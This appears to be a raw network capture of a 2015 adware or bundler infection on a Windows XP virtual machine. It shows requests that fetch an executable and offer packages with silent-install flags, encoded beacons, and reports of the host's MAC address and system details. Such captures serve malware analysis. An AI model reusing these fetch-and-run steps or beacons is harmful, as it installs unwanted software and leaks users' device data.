.... *A.X...HYYB>Dl.%....vQ...ZM..a#..Z>...q.H(X.b...l.f2....Z..
...JL3yQX.B....2....D.Phv......p....../...F".3.#.....J.J})].......
<<< skipped >>>

GET /core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 216

Connection: keep-alive

Date: Tue, 08 Sep 2015 03:55:24 GMT

Server: Apache

X-Powered-By: PHP/5.3.3

Cache-Control: maxage=10800

Expires: Tue, 08 Sep 2015 06:55:24 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 1970

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: VsqRng2sy7iGQK1Y0hvzBfI1kcGHi3wzFTr2P2B2lRQWqTdNo7eL5A==
............=..0....W..l..UG. UPp.q...m.....R..w?..T....{x...P. S. .mf
<.J...<..F........T.._.b..6.<.......F.|g ;[email protected]$
........./u...h/6{..NN.%}....'........4.RV..8.s^............./.v......
.....\oV.7.........


GET /core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8

Content-Length: 151

Connection: keep-alive

Date: Tue, 08 Sep 2015 04:26:25 GMT

Server: Apache

Accept-Ranges: bytes

Content-Encoding: gzip

Age: 110

Vary: Accept-Encoding

X-Cache: Error from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: nUKE1JrK9pKlJThHr6gzXX1elOtb_Hm8J0WVvImSrma9VEWf3AcPNA==
..........5....0.D.........V.f._P...l[.-...H<M&yy3j.@[email protected]...|
.g.....v.q..Rd........s...R..f....KA...=.6......;........z.....J.}\.ix
o...k.[...........


GET /amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 136

Connection: keep-alive

Date: Mon, 07 Sep 2015 05:23:18 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 05:23:18 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 83095

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: rDjR3EpN1bKBLx_9rc8RKRlDTjekxDM7_K9zG9kRxzXlpy9ZbBwDCQ==
..........U....!...%<.l..K.........W.|[B......f..f....^Rxjjf...F._.
u.6...qc^N.U5[...*.Cw.gP..1`.1j.......>:...3.{...^l....>.?9}.{.m
.........


GET /amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Content-Length: 1547

Connection: keep-alive

Date: Tue, 08 Sep 2015 04:28:15 GMT

Server: Apache

X-Powered-By: PHP/5.3.3

Expires: Tue, 08 Sep 2015 04:28:15 GMT

Cache-Control: max-age=0

Content-Encoding: gzip

Vary: Accept-Encoding

X-Cache: Miss from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: bgnnClCiMBQoS66pM0HzS4SFv6JRlZMcaCIjd79BsUPE3IIPj4-cxg==
...........XYo.8.~n..C`.......^&..#..v.l.}.h.....*.W......,;.[.....).!
..83..2.Q..z1......m.7m....c|.....;zw\}.U.U,.C:5m.z.s..o..>. ..w...
C...a`B.......E?..>F.gZ..'b..Tn...|..._2C..z&..>W...s.......(.Qc
1.......!j..KP....j....>.......z..k..~....v.1B......~uvr|\?>..'X
..q.s.Wd.2.....rzx|.l7.[.9gF.^......*.`.O...3 y`...W......WL[2'.7.Z>
;So...#T.W^...*.[....&..[Z).5.`.p.....u..rR...)mu..pM....(f].$....*R.$
L..R..R7Dr..!........{...ysA..y..(.K}..L.....[.ll....Z[.........jl.Z..
...>lP.D#:...F.@...@...../.Ca'.,....>.. .........o...9.z..:.....
..x......K....|'..Oc...8-..~G.........A;....w.D...G#...*.:.b.s....JN.4
2.em%..>*.~".. ...&..l..P......&..f.I.c. .^..*.....E.5..c...D1p....
rKL..w..N"..z..C.......&0.D.!...a...5Y......e!...y.....h~K.....8.wm...
...k...3..Th..Ec..mW\.f..}...JHU.. ..........V..B.6<.;|.....Tq.....
~Y...A..M..8.....6...9.Th..a. V0|OC...k...*....]....!...........@.&...
[email protected]&*.l....K..lRR...,.}.w.p.....9......!...i=!......
.1j.bN9...d..$o.f%.x....Eu.Z.|[T....5;...(...5...;..F...]9V-/.Y...T.f.
fg..6./K.o$go.>E..WY.n..LaP'..G"ozV...^)....F......:.|.'..#./c.....
.sH..B.... '...~...<..y..@6...!.r.;..1pm...\..A..~ D....b.b...(...;
9{..|.6O.m[B..:....dI.p@a%hx....V;.E...v"&...!...7{...P`.~C..(5..N.,J.
&&=.][email protected],[email protected]..........!KB.`0..2p...K..S.k.^..V.t.9 ...C
.p....W..3.......G"..4..DO....4.VSeK.,.m$.qE|.......~..&..j#..W.;.....
.......'~..o?./-l|.W.X....l..e...[.i..............n.|.^..0..>.5..;.
.)_^.......Pu.L...g/............`...,?..#?.).J.xg...VG//.{G(=Kr...
<<< skipped >>>

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 96

Connection: Keep-Alive

key=jZKJflaLST96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSg==&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:00 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:0
0 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;....


POST /wrp/ri HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 126

Connection: Keep-Alive

key=hnp8VklJSVxLUl9dTk5aXT96f3+CfVZKSUpJSUlKUj99jItWh4iHfj+Ji4ZWSUlJXEtSX11OTlpdP4KMj4ZWSj+Pho1WSz98e1ZKTU1KT1FPSktN&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: text; charset=UTF-8

Date: Tue, 08 Sep 2015 04:22:02 GMT

Server: Google Frontend

Content-Length: 4
SklJHTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: text; char
set=UTF-8..Date: Tue, 08 Sep 2015 04:22:02 GMT..Server: Google Fronten
d..Content-Length: 4..SklJ....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 280

Connection: Keep-Alive

key=jZKJflaLjI16i40/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:02 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:0
2 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 288

Connection: Keep-Alive

key=jZKJflaHjIKMjI16i414gn4/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:04 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 280

Connection: Keep-Alive

key=jZKJflaOh3+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:05 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:0
5 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 292

Connection: Keep-Alive

key=jZKJflZ+kY2LfI1/goeCjIE/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:05 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:0
5 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 284

Connection: Keep-Alive

key=jZKJflaHjIKMeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:15 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:1
5 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;..

GET /testadsreel_10656.exe HTTP/1.1

Host: secured.nmsgv.us

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:23 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441631504"

Last-Modified: Mon, 07 Sep 2015 13:11:44 GMT

Cache-Control: max-age=32721

Content-Length: 228307

Content-Type: application/octet-stream

X-HW: 1441686143.dop009.fr7.t,1441686143.cds015.fr7.c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^....... ...0.......p....@.........
.................`1..............................................t....
... 1..?..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected].......
[email protected]....,.. ...........................rsrc.
...?... [email protected]..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>

GET /client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1

Host: s3.zawss.info

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnwKFUL9f89cCJZwGJddvEdZ 20=

x-amz-request-id: 3DEF045CAF143D99

Date: Tue, 08 Sep 2015 04:22:10 GMT

Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT

ETag: "d152c08a253fe1bd8ede751d571ac800"

Accept-Ranges: bytes

Content-Type: text/html

Content-Length: 36

Server: AmazonS3
<html>..<body>..ok..</body>..</html>HTTP/1.1 2
00 OK..x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnw
KFUL9f89cCJZwGJddvEdZ 20=..x-amz-request-id: 3DEF045CAF143D99..Date: T
ue, 08 Sep 2015 04:22:10 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06
 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..
Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<htm
l>..<body>..ok..</body>..</html>..

GET /client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 HTTP/1.1

Host: s3.zawss.info

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4qE7KYQmQlDT04/u7p6p lnzU=

x-amz-request-id: D796A67BE3DB4F2A

Date: Tue, 08 Sep 2015 04:22:19 GMT

Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT

ETag: "d152c08a253fe1bd8ede751d571ac800"

Accept-Ranges: bytes

Content-Type: text/html

Content-Length: 36

Server: AmazonS3
<html>..<body>..ok..</body>..</html>HTTP/1.1 2
00 OK..x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4
qE7KYQmQlDT04/u7p6p lnzU=..x-amz-request-id: D796A67BE3DB4F2A..Date: T
ue, 08 Sep 2015 04:22:19 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06
 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..
Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<htm
l>..<body>..ok..</body>..</html>..

GET /amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s10100019.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 659

Connection: keep-alive

Date: Mon, 07 Sep 2015 17:27:48 GMT

Server: Apache

X-Powered-By: PHP/5.3.3

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 17:27:48 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 39613

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGPIL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==
...........S[O.0.~.....hBY.B.[.0qyA..4..1r..5.vg;mY...qR....).}r......
....`[email protected][email protected]..
..4...2$...|..h."..T..V./.Ku.Km.... #.`>...1...1.,.......=.......V.
.a..7..*@....d...2.&v.XR.Lz.........F....3..N.'1.Lb........i}/.......t
.-..M...5.E..7?2...|..N.uU.F .Q..1..'........SG../......a..B......?..p
....6.%.y....x.l".......|..H.3.....[K.1t....ZX...\[email protected]
.6......:.s.= ..m....".3.X...2.aoV.{.K. #..L.x..B.z...2"....K..4SN....
.u..A..cu....O#...R...Y...........~z......x..*...... @.X.~bc<....i.
.#.~..J...R.0.|....\...........>....S.rY.<....<..8GQ{..PP._.I
.....w....^lS9.u..Emf.G<.=M...h:....5L..w...HTTP/1.1 200 OK..Conten
t-Type: application/javascript..Content-Length: 659..Connection: keep-
alive..Date: Mon, 07 Sep 2015 17:27:48 GMT..Server: Apache..X-Powered-
By: PHP/5.3.3..Cache-Control: max-age=86400..Expires: Tue, 08 Sep 2015
 17:27:48 GMT..Content-Encoding: gzip..Vary: Accept-Encoding..Age: 396
13..X-Cache: Hit from cloudfront..Via: 1.1 1f3fb60768611bd03244cf06312
d5a9c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGP
IL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==.............S[O.0.~.....hBY.B.[.0qy
A..4..1r..5.vg;mY...qR....).}r..........`[email protected]_.
[email protected]$...|..h."..T..V./.Ku.Km...
. #.`>...1...1.,.......=.......V..a..7..*@....d...2.&v.XR.Lz.......
..F....3..N.'1.Lb........i}/.......t.-..M...5.E..7?2...|..N.uU.F .Q..1
..'........SG../......a..B......?..p....6.%.y....x.l".......|..H.3
<<< skipped >>>

POST /DSS_Unq_IMapplication_mon_remote.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.stsunsetwest.com

Content-Length: 281

Connection: Keep-Alive

Cache-Control: no-cache

from=nsis&type=Reg&mode=checker&utid=194.242.96.218_2015-09-08_00:22:25&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ&DB=IE&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/419~NO~4/422~YES~0/432~NO~15/460~YES~0/575~NO~4/576~NO~4/
HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:26 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 611

Connection: close

Content-Type: text/html; charset=UTF-8
422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp
.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12
~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront
.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systw
eak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..422#RE3|mystartse
archSoftware\mystartsearchhp#RCMD|-pub_id=314 -adv_id=76#SLP|30^6#PKG|
NO#INT|Mntz_Installer.exe..12#RE2|Systweak\RegClean Pro\Version 6.1#RC
MD|/verysilent#SLP|10^3#FNV|WriteINI^hXXp://dl.ourinputinfonet.com/mon
ti/llyun/hd/setup.exe#PKG|NO#INT|rcpsetup_17970.exe..

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 286

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeIyNeouNP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/fHtWSk1NSk9RT0pMSg==&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:08 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 388

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+IjFZxaUxLP4Z6h45WYoeNfoU5XIiLiYiLeo2CiId4eHhvZpB6i35FOWKHfEc/f39WP3yBVj+CflZPR0lHS1JJSUdOTkpLP4Z6fFZJSUlcS1JfXU5OWl0/fYyLVoeIh34/iYB9VoeIh34/e4J9Vkk/e46CfVZKSUk/j4ZWSz+QhI2GVkpNP3x7VkpNTUpPUU9KTEo=&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:08 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:0
8 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 404

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeHqLjHw/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT99jItWh4iHfj+JgH1Wh4iHfj97gn1WST97joJ9VkpJST+PhlZLP5CEjYZWSk0/fHtWSk1NSk9RT0pMUA==&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:14 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;....


POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 394

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeH6HfT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSkxR&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:14 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:1
4 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;..

GET /os/rm/OfferScreen_422.zip HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: secured.nmsgv.us

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:26 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1426709167"

Last-Modified: Wed, 18 Mar 2015 20:06:07 GMT

Cache-Control: max-age=32746

Content-Length: 7218

Content-Type: application/zip

X-HW: 1441686147.dop009.fr7.t,1441686146.cds009.fr7.c
PK........Q~.B...._...........inner.png.V.P.i..da.QP...h.......$.!$ G.
`........4$...UP.Ee8,..%.(.............u5..."r8r8......).j_U.....wW...
....V. ...~.4.f5.<yz..w...].b..f.X.@&.H ...s!.O...........#.H.0.-c3
.$.,Bs.u..Q<b^.=...^,$..P.PLF.k....|2*...2..P..7E..R..y).<"....p
W.4."H....8... .>..4..k....".%.~s.........h.#.K...3.t........b1 ..u
q..$....._...&..HL...[....#...0..\..;.aI4.$...,...9j4...b.G.(.Z/0. )O"
...a10..p.D...Z.A..`.N,.~I.&e..'.........-.1!..........I.D.OS......:..
|....D.).'....E.X.G#.4_.|!.D.P..>T.......5..\])x...........aAgW"..s
.r%[email protected]>T".......A....X*..y..V....U,.*.82X...q......`i...PYx4...
.|X../..O!.0...H`..9.$.....q....?9.h...W.,\i:p~.{.o....H....f4>}...
@.t..(...oB.......h3A.g.....o..i)L...1:m..s.I..e.['/.p..U~..n..X..qzYd
{./...Z...^..>..\..>w....!.PY44...a?.;%x....%..........kU....y.B
_a.( ....,T#*.M..2iLI..C.. .FX....c.%:[email protected]}.i.....lb..&......
...uV_.m.J....S3U.N. ..Y>f6f.t.....F...d....tBf..z....t..E.......u.
...m_u...77.vI.jVEn.00.....Z<[2....OZj].....n.0.Q. ....H..8.L62.zJ.
'...X..d.......>...T......(.X....i.|...>L*ub......l.o..qe.>f6
........{'e....z..p.wM...'....d!.-J.fn.K8".WD...... .ld>Rrb........
..K...gz.....5l......4}...e2Q~9,..!...2..K....}.W.._....eM...Et\...|S.
 .1#/..82rkH....n..O.\m.b.........g.t~E....gN...q.%...;'"..^4m........
.....w.e......38..V.L......^.u..j.e.......Cvi.......vq$k'.....S.N..op.
9.WV<g.. wmS............b.z$.9.>.7.T.....u.>.....-.<ps....
..K.v. .<.H...F.F....w.9................G.%..u......w.{....LB..
<<< skipped >>>

GET /os/rm/OfferScreen_12_HD.zip HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: secured.nmsgv.us

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:26 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1411022125"

Last-Modified: Thu, 18 Sep 2014 06:35:25 GMT

Cache-Control: max-age=32746

Content-Length: 10048

Content-Type: application/zip

X-HW: 1441686147.dop010.fr7.t,1441686146.cds037.fr7.c
PK.........l$Etbj.....=-......OfferScreen_12.html.:kS#7..C..A.......G.
6P.0.....;x6...5%w.m............#...s..!.#...S...w..../.....v.....S.t.
